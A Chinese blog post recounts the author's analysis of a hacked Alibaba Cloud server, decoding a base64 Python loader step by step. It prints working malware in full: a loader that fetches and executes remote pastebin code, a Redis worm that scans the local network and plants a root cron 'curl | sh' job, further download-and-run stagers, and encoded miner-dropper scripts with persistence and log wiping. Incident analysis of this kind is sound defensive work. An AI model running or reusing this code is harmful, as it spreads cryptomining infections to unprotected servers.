记一次公司阿里云被黑

其他 2019-10-24 16:21:31 阅读次数: 0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.csdn.net/FYuu95100/article/details/82351619

记一次公司阿里云被黑

1.发现问题

  公司阿里云连续四条预警,怀疑是被人黑了,并且用python程序干坏事,于是登录公司阿里云查看一波。

    进程异常行为-Linux异常文件下载 
    敏感文件篡改-Linux共享库文件预加载配置文件可疑篡改 
    恶意进程(云查杀)-挖矿程序 
    进程异常行为-Python应用执行异常指令

2.找到黑客程序

  因为有个进程异常行为-Python应用执行异常指令先看看python程序相关进程有没有干坏事

ps -aux | grep python

  结果发现三个相关程序

grep --color=auto python

/usr/bin/pytho -Es /usr/sbin/tuned -l -P

python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))
  • 第一个是 ps -aux | grep python 查询是良民不管他
  • 第二个执行了 /usr/sbin/tuned python文件 vim /usr/sbin/tuned看了一下这个文件感觉没有什么问题,但是由于我们服务器程序并没有用的python的地方,良民也给他干掉,把进程杀了
  • 第三个一看就感觉不是好东西,先杀再说

3.分析黑客程序

  杀完之后研究一下这个东西到底干了什么,看命令是通过python程序执行了一个被base64加密的一个程序,下面把I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz这个base64解码一下看看是什么东西。
  百度base64 解码随便找一个在线base64解码的看看干了什么事情,发现解码之后是一个python程序

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass

  很明显这个python程序拿到了这个https://pastebin.com/raw/nYBpuAxT这个地址的内容并且base64解码,然后运行这个程序,下面看看这个是个什么东西

IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKCklQX0xJU1QgPSBbXQoKY2xhc3Mgc2Nhbm5lcih0aHJlYWRpbmcuVGhyZWFkKToKICAgIHRsaXN0ID0gW10KICAgIG1heHRocmVhZHMgPSAxMDAKICAgIGV2bnQgPSB0aHJlYWRpbmcuRXZlbnQoKQogICAgbGNrID0gdGhyZWFkaW5nLkxvY2soKQoKICAgIGRlZiBfX2luaXRfXyhzZWxmLGhvc3QpOgogICAgICAgIHRocmVhZGluZy5UaHJlYWQuX19pbml0X18oc2VsZikKICAgICAgICBzZWxmLmhvc3QgPSBob3N0CiAgICBkZWYgcnVuKHNlbGYpOgogICAgICAgIHRyeToKICAgICAgICAgICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKICAgICAgICAgICAgcy5zZXR0aW1lb3V0KDUpCiAgICAgICAgICAgIHMuY29ubmVjdCgoc2VsZi5ob3N0LCA2Mzc5KSkKICAgICAgICAgICAgcy5zZW5kKCdzZXQgdGlnaHRzb2Z0ICJcXG5cXG5cXG4qLzEgKiAqICogKiByb290IGN1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXFxuXFxuXFxuIlxyXG4nKQogICAgICAgICAgICBzLnNlbmQoJ2NvbmZpZyBzZXQgZGlyIC9ldGMvY3Jvbi5kXHJcbicpCiAgICAgICAgICAgIHMuc2VuZCgnY29uZmlnIHNldCBkYmZpbGVuYW1lIHJvb3RcclxuJykKICAgICAgICAgICAgcy5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgcmVxID0gY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMiA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMCwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhc3MKCmRlZiBydW5Qb3J0c2NhbigpOgogICAgZ2V0X2lwX2xpc3QoKQogICAgZm9yIGhvc3QgaW4gSVBfTElTVDoKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBpZiBsZW4oc2Nhbm5lci50bGlzdCkgPj0gc2Nhbm5lci5tYXh0aHJlYWRzOgogICAgICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICAgICAgc2Nhbm5lci5ldm50LndhaXQoKQogICAgICAgIGVsc2U6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgIHNjYW5uZXIubmV3dGhyZWFkKGhvc3QpCiAgICBmb3IgdCBpbiBzY2FubmVyLnRsaXN0OgogICAgICAgIHQuam9pbigpCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgcnVuUG9ydHNjYW4oKQoK

  base64解码之后果然还是应该python程序

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((self.host, 6379))
            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /etc/cron.d\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    newthread = staticmethod(newthread)

def get_ip_list():
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'\d+.\d+.', ip2)[0]
        for i in range(0, 255):
            ip_list1 = (ips2 + (str(i)))
            for g in range(0, 255):
                IP_LIST.append(ip_list1 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()

  这个程序就稍微复杂一点了,一点点看吧,先分析一下他写的这些方法

  • get_ip_list


      访问了http://ident.me 这个网址,我访问了一下,这个网址是用来获取被访问网址的ip的,拿到阿里云主机的ip了 ,通过正则拿到这个ip的前两位然后遍历后两位,比如我的ip是192.168.123.213,这个遍历出来一个 192.168.0.0 到 192.168.255.255的数组IP_LIST
  • scanner类


      这个类是继承了threading.Thread类的主要作用就是连接socket(6379)然后发送数据主要是set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n这个 定时执行从https://pastebin.com/raw/xbY7p5Tb拿下脚本并且执行


      这个程序主要的作用就是获取到本机ip并且拿到ip的前两位,然后穷举后两位连接端口6379并发送 定时执行从https://pastebin.com/raw/xbY7p5Tb拿下脚本的信息


      然后再分析一下这个https://pastebin.com/raw/xbY7p5Tb脚本的内容:
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

  从https://pastebin.com/raw/uuYVPLXd拿下内容并base64解密执行

IyEvYmluL2Jhc2gKU0hFTEw9L2Jpbi9zaApQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2Jpbjovc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbgoKZnVuY3Rpb24ga2lsbHMoKSB7CnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIHduVEtZZyAmJiBwa2lsbCBkZGcqICYmIHJtIC1yZiAvdG1wL2RkZyogJiYgcm0gLXJmIC90bXAvd25US1lnCnJtIC1yZiAvYm9vdC9ncnViL2RlYW1vbiAmJiBybSAtcmYgL2Jvb3QvZ3J1Yi9kaXNrX2dlbml1cwpybSAtcmYgL3RtcC8qaW5kZXhfYmFrKgpybSAtcmYgL3RtcC8qaHR0cGQuY29uZioKcm0gLXJmIC90bXAvKmh0dHBkLmNvbmYKcm0gLXJmIC90bXAvYTdiMTA0YzI3MApwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJtaW5lLm1vbmVyb3Bvb2wuY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjgwODAifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6MzMzMyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgIm1vbmVyb2hhc2guY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiL3RtcC9hN2IxMDRjMjcwInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjY2NjYifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6Nzc3NyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtci5jcnlwdG8tcG9vbC5mcjo0NDMifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJzdHJhdHVtLmYycG9vbC5jb206ODg4OCJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcnBvb2wuZXUiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXJpZ0RhZW1vbiIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yaWdNaW5lciIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcGtpbGwgLWYgYmlvc2V0amVua2lucwpwa2lsbCAtZiBBblhxVi55YW0KcGtpbGwgLWYgeG1yaWdEYWVtb24KcGtpbGwgLWYgeG1yaWdNaW5lcgpwa2lsbCAtZiB4bXJpZwpwa2lsbCAtZiBMb29wYmFjawpwa2lsbCAtZiBhcGFjZWhhCnBraWxsIC1mIGNyeXB0b25pZ2h0CnBraWxsIC1mIHN0cmF0dW0KcGtpbGwgLWYgbWl4bmVyZHgKcGtpbGwgLWYgcGVyZm9ybWVkbApwa2lsbCAtZiBKbktpaEdqbgpwa2lsbCAtZiBpcnFiYTJhbmMxCnBraWxsIC1mIGlycWJhNXhuYzEKcGtpbGwgLWYgaXJxYm5jMQpwa2lsbCAtZiBpcjI5eGMxCnBraWxsIC1mIGNvbm5zCnBraWxsIC1mIGlycWJhbGFuY2UKcGtpbGwgLWYgY3J5cHRvLXBvb2wKcGtpbGwgLWYgbWluZXhtcgpwa2lsbCAtZiBYSm5Sagpwa2lsbCAtZiBOWExBaQpwa2lsbCAtZiBCSTV6agpwa2lsbCAtZiBhc2tkbGpscXcKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpwa2lsbCAtZiBHdWFyZC5zaApwa2lsbCAtZiB5c2F5ZGgKcGtpbGwgLWYgYm9ubnMKcGtpbGwgLWYgZG9ubnMKcGtpbGwgLWYga3hqZApwa2lsbCAtZiBEdWNrLnNoCnBraWxsIC1mIGJvbm4uc2gKcGtpbGwgLWYgY29ubi5zaApwa2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYga3cuc2gKcGtpbGwgLWYgcHJvLnNoCnBraWxsIC1mIHBvbGtpdGQKcGtpbGwgLWYgYWNwaWQKcGtpbGwgLWYgaWNiNW8KcGtpbGwgLWYgbm9weGkKcGtpbGwgLWYgaXJxYmFsYW5jMQpwa2lsbCAtZiBtaW5lcmQKcGtpbGwgLWYgaTU4Ngpwa2lsbCAtZiBnZGRyCnBraWxsIC1mIG1zdHhtcgpwa2lsbCAtZiBkZGcuMjAxMQpwa2lsbCAtZiB3blRLWWcKcGtpbGwgLWYgZGVhbW9uCnBraWxsIC1mIGRpc2tfZ2VuaXVzCnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIC1mIGJhc2h4CnBraWxsIC1mIGJhc2hnCnBraWxsIC1mIGJhc2hlCnBraWxsIC1mIGJhc2hmCnBraWxsIC1mIGJhc2hoCnBraWxsIC1mIFhiYXNoWQpwa2lsbCAtZiBsaWJhcGFjaGUKcm0gLXJmIC90bXAvaHR0cGQuY29uZgpybSAtcmYgL3RtcC9jb25uCnJtIC1yZiAvdG1wL3Jvb3Quc2ggL3RtcC9wb29scy50eHQgL3RtcC9saWJhcGFjaGUgL3RtcC9jb25maWcuanNvbiAvdG1wL2Jhc2hmIC90bXAvYmFzaGcgL3RtcC9saWJhcGFjaGUKcm0gLXJmIC90bXAvY29ubnMKcm0gLWYgL3RtcC9pcnEuc2gKcm0gLWYgL3RtcC9pcnFiYWxhbmMxCnJtIC1mIC90bXAvaXJxCnJtIC1mIC90bXAva3dvcmtlcmRzIC9iaW4va3dvcmtlcmRzIC9iaW4vY29uZmlnLmpzb24KbmV0c3RhdCAtYW5wIHwgZ3JlcCA2OS4yOC41NS44Njo0NDMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAzMzMzIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDU1NTUgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCA2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNzc3NyB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDMzNDcgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAxNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDUuMTk2LjIyNS4yMjIgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKeT0kKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAga3dvcmtlcmRzIHwgd2MgLWwgKQppZiBbICR7eX0gLWVxIDAgXTt0aGVuCgluZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05CmZpCn0KCmZ1bmN0aW9uIHN5c3RlbSgpIHsKCWlmIFsgISAtZiAiL2Jpbi9odHRwZG5zIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLW8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlpZiBbICEgLWYgIi9iaW4vaHR0cGRucyIgXTsgdGhlbgoJCQl3Z2V0ICBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLU8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlmaQoJCXNlZCAtaSAnJGQnIC9ldGMvY3JvbnRhYiAmJiBlY2hvIC1lICIqICovNiAqICogKiByb290IC9iaW4vc2ggL2Jpbi9odHRwZG5zIiA+PiAvZXRjL2Nyb250YWIKCWZpCgkJCn0KCmZ1bmN0aW9uIHRvcCgpIHsKCWlmIFsgISAtZiAiL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjUvMTUzNTU5NTQyN3gtMTQwNDgxNzcxMi5qcGcgLW8gL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28KCQlpZiBbICEgLWYgIi91c3IvbG9jYWwvbGliL2xpYm50cC5zbyIgXTsgdGhlbgoJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2NS8xNTM1NTk1NDI3eC0xNDA0ODE3NzEyLmpwZyAtTyAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28gJiYgY2htb2QgNzU1IC91c3IvbG9jYWwvbGliL2xpYm50cC5zbwoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2xkLnNvLnByZWxvYWQiIF07IHRoZW4KCQllY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+IC9ldGMvbGQuc28ucHJlbG9hZAoJZWxzZQoJCXNlZCAtaSAnJGQnIC9ldGMvbGQuc28ucHJlbG9hZCAmJiBlY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+PiAvZXRjL2xkLnNvLnByZWxvYWQKCWZpCgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvbGQuc28ucHJlbG9hZAoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2xpYi9saWJqZGsuc28KCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvCgllY2hvIDA+L3Zhci9zcG9vbC9tYWlsL3Jvb3QKCWVjaG8gMD4vdmFyL2xvZy93dG1wCgllY2hvIDA+L3Zhci9sb2cvc2VjdXJlCgllY2hvIDA+L3Zhci9sb2cvY3Jvbgp9CgpmdW5jdGlvbiBweXRob24oKSB7Cglub2h1cCBweXRob24gLWMgImltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKCdJMk52WkdsdVp6b2dkWFJtTFRnS2FXMXdiM0owSUhWeWJHeHBZZ3BwYlhCdmNuUWdZbUZ6WlRZMENncGtQU0FuYUhSMGNITTZMeTl3WVhOMFpXSnBiaTVqYjIwdmNtRjNMMjVaUW5CMVFYaFVKd3AwY25rNkNpQWdJQ0J3WVdkbFBXSmhjMlUyTkM1aU5qUmtaV052WkdVb2RYSnNiR2xpTG5WeWJHOXdaVzRvWkNrdWNtVmhaQ2dwS1FvZ0lDQWdaWGhsWXlod1lXZGxLUXBsZUdObGNIUTZDaUFnSUNCd1lYTnonKSkiID4vZGV2L251bGwgMj4mMSAmCgl0b3VjaCAvdG1wLy50bXBhCn0KCmZ1bmN0aW9uIGVjaG9jcm9uKCkgewoJZWNobyAtZSAiKi8xMCAqICogKiAqIHJvb3QgL2Jpbi9jaG1vZCA3NTUgL3Vzci9iaW4vY3VybCAmJiAvdXNyL2Jpbi9jdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvY3Jvbi5kL3Jvb3QKCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLW8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvdG1wL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLU8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC90bXAva3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBkb3dubG9hZHJ1bnhtKCkgewoJcG09JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG19IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL2Jpbi9jb25maWcuanNvbiIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtbyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJaWYgWyAhIC1mICIvYmluL2NvbmZpZy5qc29uIiBdOyB0aGVuCgkJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtTyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJZmkKCQlmaQoJCWlmIFsgISAtZiAiL2Jpbi9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9Cgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWlmIFsgISAtZiAiL3RtcC8udG1wYSIgXTsgdGhlbgoJCXJtIC1yZiAvdG1wLy50bXAKCQlweXRob24KCWZpCglraWxscwoJZG93bmxvYWRydW4KCWVjaG9jcm9uCglzeXN0ZW0KCXRvcAoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj

  base64解密后发现是这样一个shell,这个应该就是最终要干的坏事了

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
